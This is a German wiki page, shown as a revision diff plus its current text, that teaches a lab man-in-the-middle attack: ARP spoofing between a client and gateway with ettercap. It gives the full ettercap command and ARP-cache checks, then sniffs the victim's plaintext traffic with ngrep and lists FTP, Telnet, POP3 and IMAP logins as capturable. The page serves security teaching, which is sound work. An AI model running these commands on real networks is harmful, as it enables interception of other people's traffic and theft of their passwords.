Arpspoofing mit Ettercap Gateway vorgauckeln Grundsätzlich: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=benötigtes Paket= *apt-get install ettercap-graphical *CLIENT=10.0.10.104 *GATEWAY=10.0.10.1 *INTERFACE=eth0 =Befehl= *ettercap -i $INTERFACE -Tq -M ARP /$C…“)
 
 
(Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt)
Zeile 1: Zeile 1:
=benötigtes Paket=
+
=Ettercap: MITM zwischen Client und Gateway=
*apt-get install ettercap-graphical
+
 
 +
=Szenario=
 
*CLIENT=10.0.10.104
 
*CLIENT=10.0.10.104
 
*GATEWAY=10.0.10.1
 
*GATEWAY=10.0.10.1
 
*INTERFACE=eth0
 
*INTERFACE=eth0
 +
 +
Der Angreifer schaltet sich per ARP-Spoofing zwischen den CLIENT und das GATEWAY.
 +
Damit laeuft der gesamte Verkehr, den der CLIENT ins Internet oder in andere Netze
 +
schickt, ueber den Angreifer. Das ist der klassische Fall zum Abhoeren des
 +
Internet-Verkehrs eines einzelnen Opfers.
 +
 +
=Benoetigtes Paket=
 +
*apt-get install ettercap-graphical
 +
 +
;Das Paket ettercap-graphical enthaelt sowohl die grafische Oberflaeche als auch
 +
;den hier verwendeten Textmodus (-T). Ein separates Paket fuer die Konsole ist
 +
;nicht noetig.
  
 
=Befehl=
 
=Befehl=
*ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
+
*ettercap -i $INTERFACE -Tq -M arp /$CLIENT// /$GATEWAY//
 
+
 
'''optionen'''
+
=Optionen=
  -i eth0           =   Interface
+
  -i eth0   = Interface
  -T                 =   Textmodus
+
  -T         = Textmodus
  -q                 =   still  
+
  -q         = still (keine Paketinhalte fortlaufend ausgeben)
  -M arp             =  ARP Spoofing
+
  -M arp     =  ARP-Spoofing als MITM-Methode
 +
 
 +
=Zieldefinition=
 +
;TARGET1 /$CLIENT// und TARGET2 /$GATEWAY//
 +
:Die Zielangabe hat die Form /MAC/IP/PORT/ - leere Felder bedeuten "alles".
 +
:/10.0.10.104// heisst also: beliebige MAC, IP 10.0.10.104, alle Ports.
 +
:Ettercap vergiftet beide Richtungen: der CLIENT glaubt, der Angreifer sei das
 +
:GATEWAY, und das GATEWAY glaubt, der Angreifer sei der CLIENT.
 +
 
 +
=Nachweis auf dem CLIENT=
 +
;Im ARP-Cache steht fuer das GATEWAY die MAC-Adresse des Angreifers
 +
*arp -n | grep 10.0.10.1
 +
10.0.10.1    ether  <MAC-der-kali-innen>   C  eth0
 +
 
 +
;Der CLIENT schickt seine Pakete jetzt an den Angreifer, statt ans echte Gateway.
 +
 
 +
=Nachweis auf dem GATEWAY=
 +
;Im ARP-Cache steht fuer den CLIENT dieselbe MAC-Adresse
 +
*arp -n | grep 10.0.10.104
 +
10.0.10.104  ether  <MAC-der-kali-innen>  C  eth0
 +
 
 +
;Beide Seiten tragen fuer unterschiedliche IPs dieselbe MAC ein - das ist der Beleg
 +
;fuer den laufenden MITM.
 +
 
 +
=Was jetzt sichtbar wird=
 +
;Der gesamte Verkehr des CLIENT laeuft ueber den Angreifer. Auf einem zweiten
 +
;Terminal laesst sich der Klartext-Anteil mitlesen, z.B. mit ngrep:
 +
*ngrep -d $INTERFACE -q -W byline "" host 10.0.10.104 and tcp
 +
 
 +
;Interessant sind die Klartext-Dienste:
 +
21  FTP    Login + Passwort im Klartext
 +
23  Telnet  komplette Sitzung im Klartext
 +
80  HTTP    unverschluesselter Web-Verkehr
 +
110  POP3    Login + Passwort im Klartext
 +
143  IMAP    Login + Passwort im Klartext
 +
 
 +
;HTTPS, SSH und andere verschluesselte Dienste laufen zwar ebenfalls ueber den
 +
;Angreifer, sind aber nicht im Klartext lesbar. Genau das ist die Lehre: MITM
 +
;funktioniert weiterhin, aber Verschluesselung entwertet den Mitschnitt.
 +
 
 +
=Angriff beenden=
 +
;Ettercap mit q beenden. Beim sauberen Beenden schickt ettercap korrekte
 +
;ARP-Antworten (re-ARP), damit die ARP-Caches von CLIENT und GATEWAY wieder
 +
;auf die echten MAC-Adressen zeigen und das Opfer normal weiterarbeiten kann.
 +
 
 +
=Weiterfuehrende Angriffe=
 +
*[[Ngrep]]

Aktuelle Version vom 20. August 2026, 14:18 Uhr

Ettercap: MITM zwischen Client und Gateway

Szenario

  • CLIENT=10.0.10.104
  • GATEWAY=10.0.10.1
  • INTERFACE=eth0

Der Angreifer schaltet sich per ARP-Spoofing zwischen den CLIENT und das GATEWAY. Damit laeuft der gesamte Verkehr, den der CLIENT ins Internet oder in andere Netze schickt, ueber den Angreifer. Das ist der klassische Fall zum Abhoeren des Internet-Verkehrs eines einzelnen Opfers.

Benoetigtes Paket

  • apt-get install ettercap-graphical
Das Paket ettercap-graphical enthaelt sowohl die grafische Oberflaeche als auch
den hier verwendeten Textmodus (-T). Ein separates Paket fuer die Konsole ist
nicht noetig.

Befehl

  • ettercap -i $INTERFACE -Tq -M arp /$CLIENT// /$GATEWAY//

Optionen

-i eth0    =  Interface
-T         =  Textmodus
-q         =  still (keine Paketinhalte fortlaufend ausgeben)
-M arp     =  ARP-Spoofing als MITM-Methode

Zieldefinition

TARGET1 /$CLIENT// und TARGET2 /$GATEWAY//
Die Zielangabe hat die Form /MAC/IP/PORT/ - leere Felder bedeuten "alles".
/10.0.10.104// heisst also: beliebige MAC, IP 10.0.10.104, alle Ports.
Ettercap vergiftet beide Richtungen: der CLIENT glaubt, der Angreifer sei das
GATEWAY, und das GATEWAY glaubt, der Angreifer sei der CLIENT.

Nachweis auf dem CLIENT

Im ARP-Cache steht fuer das GATEWAY die MAC-Adresse des Angreifers
  • arp -n | grep 10.0.10.1
10.0.10.1     ether   <MAC-der-kali-innen>   C   eth0
Der CLIENT schickt seine Pakete jetzt an den Angreifer, statt ans echte Gateway.

Nachweis auf dem GATEWAY

Im ARP-Cache steht fuer den CLIENT dieselbe MAC-Adresse
  • arp -n | grep 10.0.10.104
10.0.10.104   ether   <MAC-der-kali-innen>   C   eth0
Beide Seiten tragen fuer unterschiedliche IPs dieselbe MAC ein - das ist der Beleg
fuer den laufenden MITM.

Was jetzt sichtbar wird

Der gesamte Verkehr des CLIENT laeuft ueber den Angreifer. Auf einem zweiten
Terminal laesst sich der Klartext-Anteil mitlesen, z.B. mit ngrep
  • ngrep -d $INTERFACE -q -W byline "" host 10.0.10.104 and tcp
Interessant sind die Klartext-Dienste
21   FTP     Login + Passwort im Klartext
23   Telnet  komplette Sitzung im Klartext
80   HTTP    unverschluesselter Web-Verkehr
110  POP3    Login + Passwort im Klartext
143  IMAP    Login + Passwort im Klartext
HTTPS, SSH und andere verschluesselte Dienste laufen zwar ebenfalls ueber den
Angreifer, sind aber nicht im Klartext lesbar. Genau das ist die Lehre
MITM
funktioniert weiterhin, aber Verschluesselung entwertet den Mitschnitt.

Angriff beenden

Ettercap mit q beenden. Beim sauberen Beenden schickt ettercap korrekte
ARP-Antworten (re-ARP), damit die ARP-Caches von CLIENT und GATEWAY wieder
auf die echten MAC-Adressen zeigen und das Opfer normal weiterarbeiten kann.

Weiterfuehrende Angriffe